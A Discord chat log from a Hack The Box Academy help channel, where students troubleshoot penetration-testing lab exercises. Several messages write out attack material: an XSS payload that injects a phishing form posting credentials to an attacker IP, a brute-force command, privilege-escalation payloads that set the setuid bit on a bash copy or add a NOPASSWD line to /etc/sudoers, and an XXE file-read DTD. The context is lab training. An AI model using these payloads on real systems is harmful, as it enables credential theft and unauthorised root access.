#modules
i did ||nc with source port but didnt work||
You can send me a DM.
its stuck on "Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 16:27 MSK"
Hello how are you ?
Good, just sipping coffee and messing around with stuff.
are you sure its not just taking its time? It takes a while to scan 65535 ports
Can you tell me if you encountered this problem in the Windowsprivesc module?
Ahah for me monster it's good
So you are having issues with that section?
Hum kernel exploit
You can send me a DM so I can see what you have done.
I tried 3 techniques and the first I got the hash but pass the hash does not work and the 3rd technique I get the Shell but impossible to make orders on meterpreter
Ok thx
Hello guys please I need help
on Attacking Common Services FTP
I'm trying to brute force the ftp with Medusa hydra and patator none are working
I assume you are attempting with the provided username and password lists in resources?
Give me a sec and I will spin it up and run it on my end.
ok thanks
this was the command i used medusa -u robin -P pws.list -h 10.129.102.202 -M ftp -n 2121
hello, i m having a problem with the xss phishing exercise if anyone can help, my payload works but i don't get creds
did u started php server on your pc?
guys it's assessment of sqlmap essentials, i got vector for attack and run sqlmap with tamper(blind based). But it gave me only ! as a content instead of an answer. Can u give me a hint?
no i used python http.server module, i can get http requests but no creds, here is proof that i can inject phishing form :
maybe you didnt write proper js part of the server?
why would I need that ?
your script should send cookies that it gets from site
are you using default port for the hosting? Also have you checked the script that you are hosting is correct?
80
did you use the html example from the module?
i m simply using python3 -m http.server 80
ok so make sure the script you are hosting doesn't have mistakes and double check the malicious url that you generated
yeah ofcrs
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.132/><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" value="Login"></form>');document.getElementById('urlform').remove();document.querySelector('h1')?.remove();</script><!--
been 20 minutes, is that normal?
I just tried it out with a php script and it works fine, it sent me the creds.
are you talking with me ?
you sent it to the /send.php page?
yeah, nothing happens
Sometimes. You can retry if you think its hanging
yes
what module is it?
Network Enumeration with Nmap
im gonna retry it using -v to see if it will get stuck
I haven't got to it yet so can't say. Shouldn't take that long imo
can you send it them to me if my payload is correct ? i m clueless here, perhaps regenerate new vpn
sure I DM
Hello there! Does anyone know if we have anything related to apache server in the academy? Much appreciated, thank you
Any additional insight would be appreciated. I just tested kerbrute with sshuttle, but no luck. Does kerbrute rely on something more than straight TCP/UDP access to port 88 (e.g. broadcasts or layer 2 communication)?
i did that, where does it show me the number of all tcp ports?
Apache is used in various modules. What exactly are you looking for?
did you get the output?
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 09:06 CDT
Nmap scan report for 10.129.2.49
Host is up (0.0087s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
31337/tcp open Elite
that
Today I worked on the topology machine. For this you need to know the structure of apache and how it's configured. I know I can look online for this, outside htb, but I was curious if we have anything at all for apache itself, like searching for config files etc
no, there is no module that explains to you how Apache or other webservers can/should be configured
thanks, I lacked moving forward because of this, I had to look at guidance for some tips. Either way, lesson learned. Thank you!
so how many are there?
do i add them up?
you count them
OHHH LOLL, tyyyy
Hey you can DM me.
ok
nmap -sC 10.129.132.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 17:33 MSK
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.14 seconds
why is it saying "host seems down"
use -Pn flag
Your ICMP ping got blocked by firewall
host is not respo ^
If I wireshark my ligolo interface and port scan the DC I see exactly what I would expect (e.g. a TCP 3 way handshake). If I run kerbrute, however, I don't see any traffic. It's like kerbrute is using the wrong interface??? And I don't see any options to adjust that behavior.
what module
that can mean a lot of things
Network Enumeration with Nmap
to make it work we use -Pn flag to make nmap skip the ping check and make it assume the host is UP and proceed with scan directly
im not familiar with the tool but have you checked the man page? man kerbrute | grep -i "int*"
read the module its mentioned there
use -sn on it to check if its actually up
don't hit the machine directly read through the module
yeah most of the time
nmap -sn 10.129.132.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 17:40 MSK
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.00 seconds
alr lemme read it
are u on the vpn?
yep
try with sudo
command is running so it has nothing to do with the sudo
Are there even man pages for kerbrute? They're not available on my system of the system provided by the lab.
need to clear the concept.
Oh, not familiar with the tool.. no, I don't think there are man pages. No mention of an interface flag in the github.
i see, just checked the repo looks like it's -h you may need to -h each option for its sub help.
wym
Right. Yeah there isn't an interface option AFAICT.
have you tried a canonical kerbrute cmd to see if you're getting any output expected as a sanity check?
or one you expect to work
a, simple one
sorry *module
oh, bro didnt even read first
I know kerbrute works if I run it on the provided host in the LAB environment. I don't understand why I can't use it through a pivot if TCP/UDP are open as verified by nmap. Wiresharking seems to reveal the traffic is being sent on a wrong interface or not adhering to routes. It's weird.
I would think running kerbrute through a proxy would be important because it's an early first step to establishing a next foothold.
are you using proxychains? is it outside the scope of the lab?
may want to just go at it the way the lab guides, then come back for the more advanced stuff after
I'm not using proxychains. Either sshuttle or -- even better -- ligolo where full TCP/UDP are available.
i believe you can set proxy options with nmap if that helps
yea, again, nmap isn't the problem.
Nah, as far as I recall, it just abuses the kerberos pre-auth, but I could be mistaken.
did you set proxy env vars in your terminal? i have to do this with burp
I wouldn't expect proxy environs are necessary when I'm routing. IDK if kerbrute adheres to any environmental variables like that. I don't see any mention in the docs.
certain certs may be required to decrypt encrypted traffic via proxy as well, keep that in mind.
export http_proxy=ip:PORT export https_proxy=ip:PORT
yes but if you're proxying thru terminal cmds the terminal may need them not kerbrute
not sure perhaps someone more familiar can give some advice
I'll have to try a traditional SOCKS proxy later. I tend to think sshuttle or ligolo are every bit as good and better, but maybe proxychains or setting the proxy in environs is the ticket.
Thanks, good find. That might have some insight to chew on.
…
Wrong channel. You can try elsewhere. This is for HTB Academy Modules. If you can't see other channels go to #welcome and follow the instructions.
Try #programming
Trying to spawn a target in academy and it is just spinning. Is anyone else having issues?
…
Is this channel for asking questions when stuck with a htb academy task?
yes
Thank you for the fast reply
Are you talking about the new job path, Active Directory Penetration Tester?
A cert is confirmed to be released soon so yes
yes
I am currently working through the "Information Gathering - Web Edition" Module and trying to solve the challenges for the Skills Assessment Chapter.
I am stuck with the Question " What is the API key in the hidden admin directory that you have discovered on the target system? "
I did add the shown IP with the vhost domain to the /etc/hosts file and am able to curl the site to receive the page.
But when trying to look for further directories or subdomains I am unsuccessful.
I tried gobuster dir -u http://inlanefreight.htb:<portnumber> -w <path-to-wordlist>
I also assumed that I know that the admin directory is available and tried to curl the http://inlanefreight.htb:<portnumber>/admin/robots.txt without any success as well
Any tips?
try to enumerate further
why you assume there is an admin directory?
sorry for asking, but what do you mean by further?
if dir, and subdomain doesn't work is there anything else in the module which you have yet to try?
Because the question mentions a hidden admin directory, that has been discovered
yes, but that doesn't necessarily mean the admin directory is named "admin"
keyword "hidden"
Good points, thank you both. I will try again and see what I might have missed
he is not there yet
So I spun up my lab and established a pivot through an Ubuntu host with sshuttle and then ran Kerbrute against a DC on an internal network and received accurate results. Not sure why it isn't working when you try it, but I just don't want you to think it doesn't work and not run it when you should.
can anyone help with file upload vulns skill assesment
just a tiny hint as to how to find the place files are uploaded
TINY hint please
ik which one
but it only says "only images are allowed"
do i need to fuzz for the php?
cuz i thought it was on script.js
gotcha
thats all i need thank you
sry
Please, no spoilers for modules over Tier 0
@hexed lintel wait... how can i do that if i dont get any response to it?
Take it to DM. Not here.
can i dm you dollarboysushil?
sry
ok
It's said so often here regarding public spoilers regarding modules over Tier 0
You can't not know by now.
it is definitely to make you understand that sometimes our selected wordlist won't really bear any fruits
Thanksssss!!!
For the Attacking Web Applications with Ffuf module I am on the question: One of the pages you will identify should say 'You don't have access!'. What is the full page URL? I found the private sub domains and am getting nowhere and I triple checked my /etc/hosts file: for some reason I can't reach any of my domains
you remember to use the right port?
I switch the last 2 numbers on the port, thx
Hi. Im using the comand ss -l -4 | grep -v 127.0.0.1 | wc -l
For the question of the linux fundamentals module: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
But i dont understand what is wrong
I know I have no idea which section of that module this is from, so I recommend providing more information as it can help someone drill down exactly where you are in your learning.
Anyone got any idea about this #modules message ?
Filter contents in the linux fundamentals module
Ah, there are a few ways to do this one. I used netstat.
Thank you so much for the sanity check! This is your lab, not an HTB thing?
Time for me to spin up a couple more virtuals if so... Also so weird I'm not having luck.
I would suggest re-reading the question and being more explicit with what you are using with grep. If you are still unsure after poking around, feel free to DM.
Yeah that's my home lab that I mess around with.
You can send me the lab you tried it on and when I have some time, I will check it out on my end.
Ad enumeration & attacks > initial enumeration of the domain.
If you've got the time I'd love to know if I'm missing something.
Tier 2 module, don't post content that may spoil for others. Be vague asking for advice on such things.
Did this recently if you want to dm me.
Oh my god read the chat
My bad, noted.
If you want advice on modules above Tier 0, then mention the module / section, and someone might reach out in DMs
Module: Linux Privilege Escalation
Section: Logrotate
Link to section: https://academy.hackthebox.com/module/51/section/1589
Having trouble with the question at the end of the section (can't say more without revealing details). My DMs are open, would appreciate any help. Thanks.
Did anyone solve "Attacking Common Services - SQL Databases"?
@hard matrix you can write again what you said.
Thank you
from what i saw you're just assigning $cmd to a value but not doing anything with it
we can't ask nonspecific questions as long as we dont directly include module material?
Sorry friend. We will do better
For modules over Tier 0, generally mentioning the module and section you are struggling with, and a vague description of the trouble you are having without providing screenshots, CLI output, etc etc, whatever could be considered as spoiling the steps for others is fine
Otherwise I'd advise asking for DMs from someone that is willing to provide you with advice
Advice
There's a big difference between providing a nudge in the right direction, and flat out providing the answer
absolutely
lol moderating these chats has got to be a nightmare
🫡
Not a moderator, but try to keep an eye on things now and again
Love the HTB community, but I also need to watch out for the company's best interests regarding our content and services
I just spun it up and I am not having an issue running it. I can DM a screenshot if you'd like.
I appreciate the offer. I got through but my issue is why kerbrute won't work on my attack host; won't go through sshuttle or ligolo. If you have insight, drop some wisdom.
@forest gust you can feel free to dm me the link to the mod you're working on, i think i did this a couple weeks ago but it looks like you should read the module more and see exactly what the lesson is guiding you to do, the screenshot you posted suggested you're supposed to be modifying that $cmd line in a POC script from what i saw (could be wrong)
there's lots of ways to execute and retrieve a revshell on a box
Sure, send the screen. I really appreciate the check. I'm really losing my marbles over this one
No issue
in my experience in the first place kerbrute can be unstable but that's a pretty non-specific unhelpful non-answer
also I prefer chisel :^)
Sent
i'm trying SSH for Windows: plink.exe i already downloaded openvpn and ssh to the ubuntu using plink and downloaded proxifier but i can't RDP to the windows host
What do you mean by "you can't" ?
Be more specific with the issue, error message etc...
"remote desktop can't connect to the remote computer for one of the reason"
- remote access to the server is not enabled
- the remote computer is turned off
- the remote computer is not available on the network
Give me a sec I open the module
Ah yeah this one was a bit*& haha
Check that after adding the SOCKS proxy in Proxifier, you actually see it in the list of existing proxies if you do as if you were to add a second one
Because when I did it, the server was disappearing for some reason, and so I was under the impression I had a proxy set up, when I hadn't
i went to the proxy server i can see it there like in the pic in the module i used ip 127.0.0.1 and port 9050 and socks4
i'm already ssh to the ubuntu machine using plink -ssh -D 9050 ubuntu@10.129.202.64
there's check feature in proxifier i ran it get an error saying testing failed
[25:04] Testing Started.
Proxy Server
Address: 127.0.0.1:9050
Protocol: SOCKS 4
Authentication: UserID only
[26:13] Starting: Test 1: Connection to the Proxy Server
[26:13] IP Address: 127.0.0.1
[26:13] Connection established
[26:13] Test passed.
[26:13] Starting: Test 2: Connection through the Proxy Server
[26:13] Connection to www.google.com:80 established through the proxy server.
[26:20] Error : connection to the proxy server was closed unexpectedly.
Please make sure that the target host is a Web Server.
The error may also indicate that the proxy server is not operating properly.
[26:20] Test failed.
[26:20] Testing Finished.
This test doesn't matter, the target machine doesn't have access to Internet
so it will never pass that test
You try to RDP with mstsc.exe right?
yes using the windows machine ip "172.16.5.19"
Ok gimme a sec I try
maybe its the port ?
Cant RDP but can connect with Evil-winRm and ping it. changed 3 vpn servers with no results. Happened to anyone before?
ok
Hey in the exploiting web vulnerabilities in the thick client applications section it has a SQL INJECTION SECTION in that we need to exploit with a or 1 = 1 payload i tried to use this payload in the traverse.jar executable file which we used to download a fatty server jar file to the desktop but it isn't showing me anything can someone help me
hi
for the module Intrusion Detection With Splunk (Real-world Scenario) im struggling on the question Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the method through which the other process dumped lsass. Enter the misused DLL's name as your answer. Answer format: _.dll
my answer is ntdll.dll but that doesn't work
im stuck
@uneven cairn then I'd recommend breaking down each part of the command to see what exactly it is doing, and what the description of the command is trying to convey.
The man command has been used to look at the ASCII table. Perhaps use it to look at what the other command being used does.
Does Rubeus need Admin privileges to run properly?
You should be able to assume what the command does based upon the section content, but if you need to check it further then read the manual for the command.
echo $(tr '!-}' '"-~'<<<[) this is the part that confuses me
Hi. I am doing NMAP module on academy (https://academy.hackthebox.com/module/19/section/108) and flag I found is not accepted. Hint suggests to look for the flag in web service, but I think it is incorrect. Is anyone able to confirm that? Very simple module and it shouldn't take more then 5 min including spinning the target and pwnbox. I appreciate your time and help.
Yes.. read what I said man
chatgpt can break down every part of the command for you if you ask it
I had already done that before asking on discord, there is no need to assume that I didn't do it and that I'm being lazy
and there is no need to assume i knew that, chatgpt is a great resource people don't use and you never said you tried that first or what part of it you aren't getting even after a detailed explanation
part of asking the question is saying what you've already tried and you neglected to say that so its not on me
Yes, it says what it does in a summarized way and does not break down the command that it is using as it usually does, believe me I almost never have problems understanding a part of the code in HTB academy but in this part, it is not fair to say that "it says there" I mean yes it says but I seek to understand better I do not seek to ask unnecessary questions
If you can maybe be more specific about what it is that you're not understanding could help others. As far as that section goes it's basic string manipulation.
Have you read the manual for the other command used to see what it does?
Hello, I'm trying to do the fortress Akerva but couldn't access it, can anyone help me guide on this
Yeah
See #welcome and #fortresses
wrong channel friend
What does it do then @uneven cairn ?
Which channel should I be for asking on lab fortress and other
Gubarz just linked them
I'm starting to lose my temper, I'll stop this conversation here, thanks for your help
What is the other command being shown in the content?
Ok, I'm trying to help, but it's very difficult with how you're communicating.
Best of luck, and sorry if I have caused you distress.
Don't worry goblin, I say this because it stresses me out not being able to understand well, I will take some time to analyze well what each command does and then I will continue with the module
Sometimes a break is all you need.
Bruv where u stuck?
I understand the frustration. It will click. A break is always good when you are stuck and frustrated.
If you think you have the correct flag and it is not being accepted, double check that the flag does not contain any extra spaces in the front and end of the flag. You can also refresh your screen and also double check that the lab machine is still running.
I see because I didnt verify yet so most channel not accessible, anyway thank you
???
Wanna send me your Academy ID to check what's up Vador?
I terminated both instances and refreshed page. started from beginning and made sure there is no spaces before or after. Flag is in a format HTB{xxxxxxxxxx}
You can send a DM if you'd like.
Ok, all I can say is that's not the correct answer for that question @steel trail
Given more context in DM

Did u edit the correct things?
need sanity check for Advanced Deserialization Attacks: Skills Assessment
any one to DM ??
guys i'm trying to use rpivot i ran the server.py on my side and uploaded it and ran it on the pivot host and established a connection but i can't reach the webpage i made sure i ran firefox with proxychains but its not working
try curl
i tried it with sshuttle and it worked but with rpivot its not working
The idea behind each tool is to give you an alternative, to break from the idea that there is only one correct tool
yeah i understand this why i want to use each one and learn how to use it if needed already found the flag i want to understand why its not working
didn't work i tried even ping sweep with nmap and didn't work
my suggestion is to get the answer to the question and move on, unless you wish to get deeper and find the root of the problem assuming that you have the necessary knowledge and tools to do so
i64 got aura
why am i pretty consistently getting a different response than what the example says when i try to curl inlanefreight.com with different flags
What module
https://academy.hackthebox.com/module/35/section/223 HTTP headers, im running curl -I https://www.inlanefreight.com but am missing a lot of headers that the example shows
with curl this is the error i get "curl: (35) gnutls_handshake() failed: An unexpected TLS packet was received."
HTTP/1.1 200 OK
Date: Sun, 22 Sep 2024 21:29:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Link: <https://www.inlanefreight.com/index.php/wp-json/>; rel="https://api.w.org/"
Link: <https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json"
Link: <https://www.inlanefreight.com/>; rel=shortlink
Content-Type: text/html; charset=UTF-8
this is what my output is btw
Pretty sure they just added fake info to the command
I don't think the site even gives cookies
Hey guys im stuck on payloads and shells module
trying to do the following command, i deactivated the antivirus but no success
There are a lot of syntax errors..
i think that's meant to be ||run in Command Prompt||
my bad
How did you come up with that
it was a cmd command
precisely because of the syntax errors
Urgh nope, not getting involved
if you encoded the command you can run it without any issue
but yea syntaxes between the two shells aren't the same
but with powershell in the beginning it calls powershell to execute it no?
ow okej its pure syntax thats why it wasn't working
right?
yea, you're running the command in powershell so it's going to process the syntax as powershell syntax
okej thanks you
Ah, Starting Point?
..
"Port Forwarding with Windows Netsh" is not working i ran netsh on the windows pivot machine and forwarded the connection but when i try to rdp again to 172.16.5.19 i get an error saying broken pipe
i tried to rdp to the pivot with port 8080 didn't work also
sounds like something isn't setup correctly then
when i do the verifying port forward i get this output
Address Port Address Port
10.129.15.150 8080 172.16.5.19 3389
Kinda hard to troubleshoot this module from the outside
There's a lot of commands that need to be setup
Command Injections
Bypassing Space Filters
It doesn't return any error nor the expected result, I expect an output to ls /home
the module says a great way to find out, remove all the injection characters and start adding them back 1 by 1 until it stops working, and that's how you can find which one it's being stopped at
these the steps i did:
1- connected to pivot host using xfreerdp
2- after that i ran netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19
3- after that i tried to rdp to 172.16.5.19 and 10.129.15.150 and 10.129.223.253 with port 8080 and didn't work
these the steps mentioned on the module i'm missing something should i use proxychains ? because its not mentioned
It's already solved but in that module it should also work by character shifting, right?
FFFFFFFFFFFF
solved it it was the listenaddress my bad
please can i anyone help me , ls is not working on smb connection https://academy.hackthebox.com/module/147/section/1327
My turn to ask a question:
Try to RDP on the Intro to AD first lab machine, and getting this:
[19:18:38:575] [160747:160748] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]
Already reset the target, no change.
I could RDP on all other modules target so far, first time I have an issue.
Could that be a connection issue / VPN ?
ping is pretty high to the machine but
any help is well appreciated.
Are you on "Initial Enumeration of the Domain"? I'm getting "login failed for display 0" myself where RDP had worked the last time I loaded the module. I'm terminating and respawning the lab now.
I'm in:
AD Administration: Guided Lab Part I
Sorry, I'm on AD Enumeration & Attacks.
Could it be they have issues overall on AD? Not sure how these are set up
Terminating and restarting my lab worked to resolve the issue. Sometimes, especially with AD labs that could involve multiple systems, it might take a few minutes after the lab is "spawned" for everything to startup.
Ok thanks will reset and wait 5-10min before trying to connect
I had the same issue and was going crazy.
My problem was that I was using an old password and didn't realize they changed up RDP passwords in between sections. So make sure you're using the right one.
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found. i mean in /home is just the flag of the previous section
I am stuck on question 3 of LDAP module - Search Filters: Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group. I am using :
Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName
but is not accepting it as answer
Can someone please tell me what's wrong?
I'm hitting errors on the cme module, the group policy object spider is erroring out saying NetBIOS timed out. It enumerated the shares then starts spidering and errors. I've added the host and domain to /etc/hosts but I'm lost now
For module Info-gathering web edition I'm stuck on the skill assement question What is the API key in the hidden admin directory that you have discovered on the target system? I have my /etc/hosts configured properly and ran multiple scans
this command should work
network problem, check your connection and try switching vpn servers
This one is working, kind of, but cannot filter by SPN set: Get-ADGroupMember -Identity "Protected Users"
Pwnbox, reset both attacker and target machine, issue persists
Every other attack is working pre and post that one
filter by admin count
It is giving me the wrong account
yes the vpn server affects pwnbox connections too
Thanks
ah ok you need to find the group then search for the user
Indeed, lol
Maybe I need to pipe?
but I do not know
Find the group, then loop or pipe via Get-ADUser ?
Module: Linux Privilege Escalation
Section: Logrotate
Link to section: https://academy.hackthebox.com/module/51/section/1589
I'm working on the question at the end of the section.
I managed to rotate the log file but didn't receive a reverse shell.
This one should work: Get-ADGroupMember -Identity "Protected Users" | Get-ADUser -Properties * | where servicePrincipalName -ne $null | select name
but it is not
It is returning two accounts, one of them is the correct one
it's a bit of a pain to write cause you need to chain multiple cmdlets together
Get-ADGroup -Filter "adminCount -eq 1" | ForEach-Object { Get-ADGroupMember -Identity $_ | ForEach-Object { Get-ADUser -Identity $_ -Properties SamAccountName, MemberOf, servicePrincipalName | Where-Object { $_.servicePrincipalName -ne $null } } }
Be sure to scan everything.
try using a suid binary or giving yourself sudo instead of making a shell because the window to catch it is very short
so yeah, I need a loop
yep
Jesus Christ. I would have never done that, not tonight.
Issue persists
I tried repeatedly ffuf, dnsenum, the scapy web scraper
Oh, so this should work since logrotate runs as root? Btw how do I check what logrotate runs as?
You can send me a DM to show what you have tried.
the service run as root iirc since it's a system service
Will do
idk worked for me before, see if you have better luck with netexec, otherwise contact support
do we need this type of skills or deep knowledge later on the module? or it is just showing the basics of filters? In other words, would I be ok just moving on? it seems like the next section will use PowerView? I just do not want to spend a lot of time learning PS Loops. If not needed for this module. I know it would be nice, but trying to be practical.
I see. So it always runs as root then.
Uhh, how do I do this? I tried running this as the payload, but it clearly didn't work since a bash binary didn't show in my home directory.
#!/usr/bin/bash
cp /usr/bin/bash /home/htb-student/bash
chmod +s /home/htb-student/bash
I even tried this script as the payload, but it didn't work.
#!/usr/bin/bash
echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers
I'm heading to bed, so if you are still stuck on this tomorrow, feel free to DM me.
Sounds good
if nothing happens that means the exploit isn't being triggered
I thought that may be the case, so I retraced my steps. I compiled the exploit on the target and I used the proper syntax, so I'm unsure what the issue could be.
you'll just need to understand how they work, for the most part you won't be writing much powershell scripts, there are other tools like powerview as you said and bloodhound, and also chatgpt to help you write commands
Funny, being using ChatGPT to assist myself on this question, lol...
Thanks @next bronze ... calling the night, appreciate your help.
did you find the file you can write into to trigger the rotation?
I managed to figure out what the problem is. I have the bash binary in my home directory now, but how do I execute it?
bash -p
Thanks
These permissions looking a little weird. Is it cuz the setuid bit is set?
that doesn't look right, it should show as root
I added myself to the sudoers file but when I use su it prompts for a password and then fails even when I provide the password.
sudo?
?
sudo su
Ahh, nvm, that worked.
Don't know why I was trying just su.
I think in an earlier exercise for some weird reason sudo su wasn't working but just su was.
Netexec same issue, seems to happen with spidering so I've hit the helpline. Thanks for your help
Hello, I have a problem with the flag I found in SQLMAP - Skills Assessment. I've found the flag and I'm sure of it, but the flag in question doesn't work, or rather it seems that the other part of the flag is missing. Can you help me?
Just a question about Nmap options.
I noticed that these three: ' -Pn -n --disable-arp-ping ' are always used together. Is it done so to avoid sending too many unwanted packets (ICMP, ARP) which get sent to the target by default? And also to avoid Firewall/IDS from picking it up?
Please correct me if I am wrong
no, I have notes for them but I don't memorise them. if i work with ps daily maybe I will
tbf if you know how to read and have some knowledge just get chatgpt to write the base and you can debug or fix whatever dumb thing it might spit out
Hi,
Module: Web Attacks
Section: Advanced File Disclosure
Link to section: https://academy.hackthebox.com/module/134/section/1206
For error based XXE, I don't understand why we need parameter entities. Is it because we are trying to join the non-existing entity and %file entity. Why is there an extra entity content? It is not even used anywhere.
Hello, i have a problem with spawning the target, yesterday I tried to spawn it and it still hasn't started. Is it possible to stop the launch and try again? (Skills Assessment - Advanced XSS and CSRF Exploitation)
Use what you find on Arturo's Desktop.
Module: Linux Privilege Escalation
Section: Miscellaneous Techniques
Link to section: https://academy.hackthebox.com/module/51/section/478
I'm working on the question at the end of the section.
I'm unable to execute the shell I compiled since the version of GLIBC present on the target is older than the version I compiled the program with. How can I tackle this issue?
i know the payload is right because it did work, but sometimes it works and sometimes not, why? now it is not working, i can resend the request any number of times and it is still not working for some reason:
```
POST / HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://ip:port
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

ip=payload(the same payload works sometimes yes sometimes no)
```
Where are you seeing an extra entity content? I can't see it.
you're giving answers away you should delete that code
then how i would get help?
either: compile on target, statically compile on your host gcc -static or compile in a vm with similar or lower library versions
But if I compile on target then it'll no longer have the setuid bit for the root user?
The external DTD that we host is:
`<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">`. It looks like a nested entity. But why is it necessary?
What's the -static option do?
content of the module? dude
Why not?
It may still have the setuid bit but the file owner will change, won't it?
I'll test it out and see.
Doesn't the file permissions change on every machine?
The first line is defining the file we want to retrieve. The second one is throwing the error.
If you look at the example at the end of that section, it may make more sense to you.
The error is thrown when we reference a non-existing entity. Let me rephrase my question. Why does the DTD not look like this?
```
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error SYSTEM '%nonExistingEntity;/%file;'>
```
Not 100% I get what you're saying, but in this case because of the way that NFS is configured, if I copy a file owned by the local root user with the setuid bit set, it retains the permissions, and then I can use that to escalate privileges from the target. So, the permission doesn't change in this case, however, if I compile the program, it does change since I'm running gcc as the low-privileged user.
Ahh, seems I misunderstood your question. I don't get why that extra "> bit is there at the end.
Oh yeah for NFS some permissions stay. didn't click the module
Does it have to be a compiled file?
Not just that. I mean generally we define XML external entity as <!ENTITY {entity_name} SYSTEM {entity_value}. But in this particular section, the entity_value itself looks like a new entity definition <!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>.
In this case, yes. I ended up taking Xre0uS's advice and used the -static flag. It compiled.
I already tried with BASH scripts but that didn't work, it just ran with the low-privileged user's permissions.
Reverse shells didn't give root either.
Does embedding another entity definition as content of one entity mean that the content entity will be parsed dynamically?
I see the same pattern on the Blind Data Exfiltration as well where entity nesting is done.
Wait, how does it look like a new entity definition? There's no defining happening? It's just referencing/calling entities?
If we look at <!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">, it follows the format <!ENTITY {entity_name} SYSTEM {entity_value}. The entity_value in this case is <!ENTITY content SYSTEM '%nonExistingEntity;/%file;'> which again follows the same format! Why?
Okay, got it now. Sry, it's been a while for me and I haven't cleaned up my notes on a lot of parts yet.
I guess it's the nesting that allows for this to work?
@eager ledge if someone gives a proper answer, would you please ping me? Thanks.
Sure
Hello can someone please help in solving following question.
What is the name of the security standard for credit card payments that a company must adhere to? (Answer Format: acronym)
I tried all possible answers. None of them is correct. I don't know what is the issue.
read the module
i think its clearly mentioned in the module/section u just read
Please i beg you guys.
like really you have the answers on your screen and you are asking here
Can't spawn the Tomcat target on Attacking Common Applications 🥴 Does anyone have the problem?
i can give answer too but you still won't get it people connecting ideas, driving smart solutions.
<@&861185840277487616>
what is this at?
I did try harder. And just wow.
not u bro chill, someone was advertising here
i know
it's was in corner.
but whats power does it have?
well rule break, so when someone does smth against the rules, u report it like here
and u can assume what a mod will do when someone break the rules so
I install Privacy Badger for Firefox and the target spawned. I assume the HTBA page was trying to load a domain that blocked in my country. Maybe I'm wrong
In AD Enumeration & Attacks - Skills Assessment Part I we are supposed to upload all the tools needed?
Hey could someone help me in exploiting web vulnerabilities thick client applications after we download the fatty server. Jar file
someone can help me ?
feel free to dm me your steps and I will give you a nudge if needed
ok
Got a rev shell on Attackin AD Skill Ass 1 but it doesnt return the output of the commands any ideas what could be wrong with the shell ?
Same commands on the web shell execute perfectly
Try a different revshell maybe?
Other payloads give me the following page. Think this is part of the setup? Though the tools needed for SA are not in the webshell, or can't upload them although there is an upload option, can't find the file after being uploaded (in the same directory)
Only answered the first question of the assessment, let me try yours, one moment
How did you transfer the payload to the webshell?
Isn't there just an upload function on the shell?
Yes, but after upload cant find the files I upload. Shouldnt they be on the same folder?
Fail to upload for exes
tbh, what i did backthen, is just got a powershell reverse shell
didnt upload anything
One liner?
try that ¯\_(ツ)_/¯
yeah the base64 encoded one, from revshells.com
@shell ore I get this
Let me try this one
I dont know why the f your solution worked and all the other payloads didnt but thank you A LOT ❤️
lol, good luck w the rest
All the exes were uploaded here, dont know if i should have known that
sorry for the delay. Unexpected friend gone to heaven. Yes, I did. The whole URL I should send to the victim.
Password Attack module, Skill Assessment - Hard Lab. When im connecting to david smb share with credentials i obtained via kdbx file, i can see "Backup.vhd" file. But i cant download it with "get Backup.vhd" for some reason. every time i get "smb: \> get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \> getting file \Backup.vhd of size 136315392 as Backup.vhd SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now" message. any idea how to fix?
cuz the file is large, ig u can try mounting the share on ur box, then copy it locally (SHOULD work)
mount -t cifs //[server-ip]/[share-path] /[mount-point]
Colleagues I have C drive to share and take the sam base to my localhost and I have mounted the smbserver.py but I have the following error when moving the files the network path was not found -->Module Pivoting, Tunneling, and Port Forwarding
sudo proxychains xfreerdp /v:172.16.5.35 /u:mlefay /p:'Simple human work!' /unit:C,*
Hi everyone. I'm going through the Password attacks module and I'm stuck on "Network Services". I'm trying to find the RDP user and password, I used the dictionary from HTB but crackmapexec didn't give me anything.
thanks so much, command "sudo mount -t cifs -o username=<win_share_user> //WIN_SHARE_IP/<share_name> /mnt/win_share" helped. This was due to the size of file.
Hello I am on the broke authentication module and i am on the question On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?
wlc
Having some trouble on the web fuzzing module, It has told me to search for virtual hosts using gobuster and the common wordlist, but nothing shows up.
I'm not asking for an answer to it, but more what exactly im doing wrong
but I cant seem to find the answer in the module, please can anyone give me a hint
